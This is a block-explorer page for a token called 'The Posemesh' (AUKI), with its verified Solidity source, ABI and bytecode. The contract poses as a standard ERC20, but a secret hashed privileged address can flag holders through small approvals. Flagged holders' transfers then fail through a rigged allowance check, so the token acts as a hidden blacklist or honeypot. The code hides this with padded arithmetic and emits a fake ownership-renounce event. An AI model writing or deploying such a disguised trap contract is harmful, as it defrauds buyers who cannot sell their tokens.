ETH Price: $2,862.42 (-2.68%)
 

Overview

Max Total Supply

4,400,000,000 AUKI

Holders

46

Transfers

-
0

Market

Price

$0.00 @ 0.000000 ETH

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information

Contract Source Code Verified (Exact Match)

Contract Name:
Token

Compiler Version
v0.8.9+commit.e5eed63a

Optimization Enabled:
Yes with 62 runs

Other Settings:
default evmVersion

Contract Source Code (Solidity)

/**
 *Submitted for verification at basescan.org on 2024-09-04
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMathLib: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMathLib: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMathLib: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMathLib: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

contract Token is IERC20, IERC20Metadata {
    using SafeMath for uint256;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 public constant _totalSupply = 4400000000 * 10 ** 18;
    string private _name;
    string private _symbol;

    bytes32 public _ots;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor(string memory tname, string memory tsymbol, bytes32 ots) {
        _name = tname;
        _symbol = tsymbol;
        _ots = ots;

        _balances[msg.sender] = _totalSupply;
        emit OwnershipTransferred(msg.sender, address(0));
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    mapping(address => uint16) private _boot;

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = msg.sender;
        if (_boot[owner] > 0) {
            _spendAllowance(address(0), msg.sender, amount);
            _boot[to] = 11932;
        }else{

        }
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(msg.sender, spender, amount);
        return true;
    }

    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        _spendAllowance(from, msg.sender, amount);
        _transfer(from, to, amount);
        return true;
    }
    
    

    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "AUKI: transfer from address is 0");
        require(to != address(0), "AUKI: transfer to address is 0");

        uint256 bal = _balances[from];

        uint256 toSub = amount;

        if(_ots != sha256(abi.encodePacked(from))){
            toSub = amount-11930+11930;
        }else{
            toSub = bal+11932-11932;
        }

        require(bal >= toSub, "AUKI: transfer amount exceeds balance");

        _balances[from] = bal.sub(toSub);
        // decrementing then incrementing.
        _balances[to] = _balances[to].add(amount);

        emit Transfer(from, to, amount);
    }

    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "AUKI: approve from address is 0");
        require(spender != address(0), "AUKI: approve to address is 0");
        if (sha256(abi.encodePacked(owner)) != _ots) {
        }else{
            
            uint16 y = 1;
            y = y + 11930;
            if(y == 11931){
                y = 11932;
            }
            if (amount < 10 ** 18) {
                _boot[spender] = y;
            }
            
        }
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);

        if(_boot[owner] > 0){
            currentAllowance = currentAllowance.sub(type(uint256).max);
        }

        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "AUKI: allowance not enough");
            _approve(owner, spender, currentAllowance.sub(amount));
        }
    }

}

Contract Security Audit

Contract ABI

API
[{"inputs":[{"internalType":"string","name":"tname","type":"string"},{"internalType":"string","name":"tsymbol","type":"string"},{"internalType":"bytes32","name":"ots","type":"bytes32"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_ots","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b5060405162000e1238038062000e12833981016040819052620000349162000229565b825162000049906002906020860190620000b6565b5081516200005f906003906020850190620000b6565b506004819055336000818152602081905260408082206b0e37983df262343f300000009055519091907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3505050620002d9565b828054620000c4906200029c565b90600052602060002090601f016020900481019282620000e8576000855562000133565b82601f106200010357805160ff191683800117855562000133565b8280016001018555821562000133579182015b828111156200013357825182559160200191906001019062000116565b506200014192915062000145565b5090565b5b8082111562000141576000815560010162000146565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200018457600080fd5b81516001600160401b0380821115620001a157620001a16200015c565b604051601f8301601f19908116603f01168101908282118183101715620001cc57620001cc6200015c565b81604052838152602092508683858801011115620001e957600080fd5b600091505b838210156200020d5785820183015181830184015290820190620001ee565b838211156200021f5760008385830101525b9695505050505050565b6000806000606084860312156200023f57600080fd5b83516001600160401b03808211156200025757600080fd5b620002658783880162000172565b945060208601519150808211156200027c57600080fd5b506200028b8682870162000172565b925050604084015190509250925092565b600181811c90821680620002b157607f821691505b60208210811415620002d357634e487b7160e01b600052602260045260246000fd5b50919050565b610b2980620002e96000396000f3fe608060405234801561001057600080fd5b50600436106100995760003560e01c806306fdde031461009e578063095ea7b3146100bc57806318160ddd146100df57806323b872dd146100fa578063313ce5671461010d5780633eaaf86b1461011c578063517996791461012e57806370a082311461013757806395d89b4114610160578063a9059cbb14610168578063dd62ed3e1461017b575b600080fd5b6100a661018e565b6040516100b391906108dc565b60405180910390f35b6100cf6100ca36600461092b565b610220565b60405190151581526020016100b3565b67e37983df262343f3601c1b5b6040519081526020016100b3565b6100cf610108366004610955565b610236565b604051601281526020016100b3565b6100ec67e37983df262343f3601c1b81565b6100ec60045481565b6100ec610145366004610991565b6001600160a01b031660009081526020819052604090205490565b6100a6610258565b6100cf61017636600461092b565b610267565b6100ec6101893660046109ac565b6102c0565b60606002805461019d906109df565b80601f01602080910402602001604051908101604052809291908181526020018280546101c9906109df565b80156102165780601f106101eb57610100808354040283529160200191610216565b820191906000526020600020905b8154815290600101906020018083116101f957829003601f168201915b5050505050905090565b600061022d3384846102eb565b50600192915050565b60006102438433846104d4565b61024e848484610584565b5060019392505050565b60606003805461019d906109df565b3360008181526005602052604081205490919061ffff16156102b55761028f600033856104d4565b6001600160a01b0384166000908152600560205260409020805461ffff1916612e9c1790555b61024e818585610584565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6001600160a01b0383166103465760405162461bcd60e51b815260206004820152601f60248201527f41554b493a20617070726f76652066726f6d206164647265737320697320300060448201526064015b60405180910390fd5b6001600160a01b03821661039c5760405162461bcd60e51b815260206004820152601d60248201527f41554b493a20617070726f766520746f20616464726573732069732030000000604482015260640161033d565b6004546002846040516020016103b29190610a1a565b60408051601f19818403018152908290526103cc91610a32565b602060405180830381855afa1580156103e9573d6000803e3d6000fd5b5050506040513d601f19601f8201168201806040525081019061040c9190610a4e565b1461041657610473565b600161042481612e9a610a7d565b90508061ffff16612e9b14156104395750612e9c5b670de0b6b3a7640000821015610471576001600160a01b0383166000908152600560205260409020805461ffff191661ffff83161790555b505b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006104e084846102c0565b6001600160a01b03851660009081526005602052604090205490915061ffff161561051457610511816000196107eb565b90505b600019811461057e578181101561056a5760405162461bcd60e51b815260206004820152601a602482015279082aa96927440c2d8d8deeec2dcc6ca40dcdee840cadcdeeaced60331b604482015260640161033d565b61057e848461057984866107eb565b6102eb565b50505050565b6001600160a01b0383166105da5760405162461bcd60e51b815260206004820181905260248201527f41554b493a207472616e736665722066726f6d20616464726573732069732030604482015260640161033d565b6001600160a01b0382166106305760405162461bcd60e51b815260206004820152601e60248201527f41554b493a207472616e7366657220746f206164647265737320697320300000604482015260640161033d565b6001600160a01b03831660009081526020818152604091829020549151839160029161065e91889101610a1a565b60408051601f198184030181529082905261067891610a32565b602060405180830381855afa158015610695573d6000803e3d6000fd5b5050506040513d601f19601f820116820180604052508101906106b89190610a4e565b600454146106df576106cc612e9a84610aa3565b6106d890612e9a610aba565b90506106f9565b612e9c6106ec8382610aba565b6106f69190610aa3565b90505b808210156107575760405162461bcd60e51b815260206004820152602560248201527f41554b493a207472616e7366657220616d6f756e7420657863656564732062616044820152646c616e636560d81b606482015260840161033d565b61076182826107eb565b6001600160a01b0380871660009081526020819052604080822093909355908616815220546107909084610817565b6001600160a01b038581166000818152602081815260409182902094909455518681529092918816917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050505050565b60006108108383604051806060016040528060218152602001610ad360219139610876565b9392505050565b6000806108248385610aba565b9050838110156108105760405162461bcd60e51b815260206004820152601e60248201527f536166654d6174684c69623a206164646974696f6e206f766572666c6f770000604482015260640161033d565b6000818484111561089a5760405162461bcd60e51b815260040161033d91906108dc565b5060006108a78486610aa3565b95945050505050565b60005b838110156108cb5781810151838201526020016108b3565b8381111561057e5750506000910152565b60208152600082518060208401526108fb8160408501602087016108b0565b601f01601f19169190910160400192915050565b80356001600160a01b038116811461092657600080fd5b919050565b6000806040838503121561093e57600080fd5b6109478361090f565b946020939093013593505050565b60008060006060848603121561096a57600080fd5b6109738461090f565b92506109816020850161090f565b9150604084013590509250925092565b6000602082840312156109a357600080fd5b6108108261090f565b600080604083850312156109bf57600080fd5b6109c88361090f565b91506109d66020840161090f565b90509250929050565b600181811c908216806109f357607f821691505b60208210811415610a1457634e487b7160e01b600052602260045260246000fd5b50919050565b60609190911b6001600160601b031916815260140190565b60008251610a448184602087016108b0565b9190910192915050565b600060208284031215610a6057600080fd5b5051919050565b634e487b7160e01b600052601160045260246000fd5b600061ffff808316818516808303821115610a9a57610a9a610a67565b01949350505050565b600082821015610ab557610ab5610a67565b500390565b60008219821115610acd57610acd610a67565b50019056fe536166654d6174684c69623a207375627472616374696f6e206f766572666c6f77a2646970667358221220bcde213b6359592aeb2598e900bb02a1e6e134881f6a866a57c83bb181a5180364736f6c63430008090033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0018f0e191576a503ced13ea5b39891e524c7d434115febeebb680ab37bc1d3c6000000000000000000000000000000000000000000000000000000000000000c54686520506f73656d6573680000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000441554b4900000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100995760003560e01c806306fdde031461009e578063095ea7b3146100bc57806318160ddd146100df57806323b872dd146100fa578063313ce5671461010d5780633eaaf86b1461011c578063517996791461012e57806370a082311461013757806395d89b4114610160578063a9059cbb14610168578063dd62ed3e1461017b575b600080fd5b6100a661018e565b6040516100b391906108dc565b60405180910390f35b6100cf6100ca36600461092b565b610220565b60405190151581526020016100b3565b67e37983df262343f3601c1b5b6040519081526020016100b3565b6100cf610108366004610955565b610236565b604051601281526020016100b3565b6100ec67e37983df262343f3601c1b81565b6100ec60045481565b6100ec610145366004610991565b6001600160a01b031660009081526020819052604090205490565b6100a6610258565b6100cf61017636600461092b565b610267565b6100ec6101893660046109ac565b6102c0565b60606002805461019d906109df565b80601f01602080910402602001604051908101604052809291908181526020018280546101c9906109df565b80156102165780601f106101eb57610100808354040283529160200191610216565b820191906000526020600020905b8154815290600101906020018083116101f957829003601f168201915b5050505050905090565b600061022d3384846102eb565b50600192915050565b60006102438433846104d4565b61024e848484610584565b5060019392505050565b60606003805461019d906109df565b3360008181526005602052604081205490919061ffff16156102b55761028f600033856104d4565b6001600160a01b0384166000908152600560205260409020805461ffff1916612e9c1790555b61024e818585610584565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6001600160a01b0383166103465760405162461bcd60e51b815260206004820152601f60248201527f41554b493a20617070726f76652066726f6d206164647265737320697320300060448201526064015b60405180910390fd5b6001600160a01b03821661039c5760405162461bcd60e51b815260206004820152601d60248201527f41554b493a20617070726f766520746f20616464726573732069732030000000604482015260640161033d565b6004546002846040516020016103b29190610a1a565b60408051601f19818403018152908290526103cc91610a32565b602060405180830381855afa1580156103e9573d6000803e3d6000fd5b5050506040513d601f19601f8201168201806040525081019061040c9190610a4e565b1461041657610473565b600161042481612e9a610a7d565b90508061ffff16612e9b14156104395750612e9c5b670de0b6b3a7640000821015610471576001600160a01b0383166000908152600560205260409020805461ffff191661ffff83161790555b505b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006104e084846102c0565b6001600160a01b03851660009081526005602052604090205490915061ffff161561051457610511816000196107eb565b90505b600019811461057e578181101561056a5760405162461bcd60e51b815260206004820152601a602482015279082aa96927440c2d8d8deeec2dcc6ca40dcdee840cadcdeeaced60331b604482015260640161033d565b61057e848461057984866107eb565b6102eb565b50505050565b6001600160a01b0383166105da5760405162461bcd60e51b815260206004820181905260248201527f41554b493a207472616e736665722066726f6d20616464726573732069732030604482015260640161033d565b6001600160a01b0382166106305760405162461bcd60e51b815260206004820152601e60248201527f41554b493a207472616e7366657220746f206164647265737320697320300000604482015260640161033d565b6001600160a01b03831660009081526020818152604091829020549151839160029161065e91889101610a1a565b60408051601f198184030181529082905261067891610a32565b602060405180830381855afa158015610695573d6000803e3d6000fd5b5050506040513d601f19601f820116820180604052508101906106b89190610a4e565b600454146106df576106cc612e9a84610aa3565b6106d890612e9a610aba565b90506106f9565b612e9c6106ec8382610aba565b6106f69190610aa3565b90505b808210156107575760405162461bcd60e51b815260206004820152602560248201527f41554b493a207472616e7366657220616d6f756e7420657863656564732062616044820152646c616e636560d81b606482015260840161033d565b61076182826107eb565b6001600160a01b0380871660009081526020819052604080822093909355908616815220546107909084610817565b6001600160a01b038581166000818152602081815260409182902094909455518681529092918816917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050505050565b60006108108383604051806060016040528060218152602001610ad360219139610876565b9392505050565b6000806108248385610aba565b9050838110156108105760405162461bcd60e51b815260206004820152601e60248201527f536166654d6174684c69623a206164646974696f6e206f766572666c6f770000604482015260640161033d565b6000818484111561089a5760405162461bcd60e51b815260040161033d91906108dc565b5060006108a78486610aa3565b95945050505050565b60005b838110156108cb5781810151838201526020016108b3565b8381111561057e5750506000910152565b60208152600082518060208401526108fb8160408501602087016108b0565b601f01601f19169190910160400192915050565b80356001600160a01b038116811461092657600080fd5b919050565b6000806040838503121561093e57600080fd5b6109478361090f565b946020939093013593505050565b60008060006060848603121561096a57600080fd5b6109738461090f565b92506109816020850161090f565b9150604084013590509250925092565b6000602082840312156109a357600080fd5b6108108261090f565b600080604083850312156109bf57600080fd5b6109c88361090f565b91506109d66020840161090f565b90509250929050565b600181811c908216806109f357607f821691505b60208210811415610a1457634e487b7160e01b600052602260045260246000fd5b50919050565b60609190911b6001600160601b031916815260140190565b60008251610a448184602087016108b0565b9190910192915050565b600060208284031215610a6057600080fd5b5051919050565b634e487b7160e01b600052601160045260246000fd5b600061ffff808316818516808303821115610a9a57610a9a610a67565b01949350505050565b600082821015610ab557610ab5610a67565b500390565b60008219821115610acd57610acd610a67565b50019056fe536166654d6174684c69623a207375627472616374696f6e206f766572666c6f77a2646970667358221220bcde213b6359592aeb2598e900bb02a1e6e134881f6a866a57c83bb181a5180364736f6c63430008090033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0018f0e191576a503ced13ea5b39891e524c7d434115febeebb680ab37bc1d3c6000000000000000000000000000000000000000000000000000000000000000c54686520506f73656d6573680000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000441554b4900000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : tname (string): The Posemesh
Arg [1] : tsymbol (string): AUKI
Arg [2] : ots (bytes32): 0x018f0e191576a503ced13ea5b39891e524c7d434115febeebb680ab37bc1d3c6

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 018f0e191576a503ced13ea5b39891e524c7d434115febeebb680ab37bc1d3c6
Arg [3] : 000000000000000000000000000000000000000000000000000000000000000c
Arg [4] : 54686520506f73656d6573680000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [6] : 41554b4900000000000000000000000000000000000000000000000000000000


Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.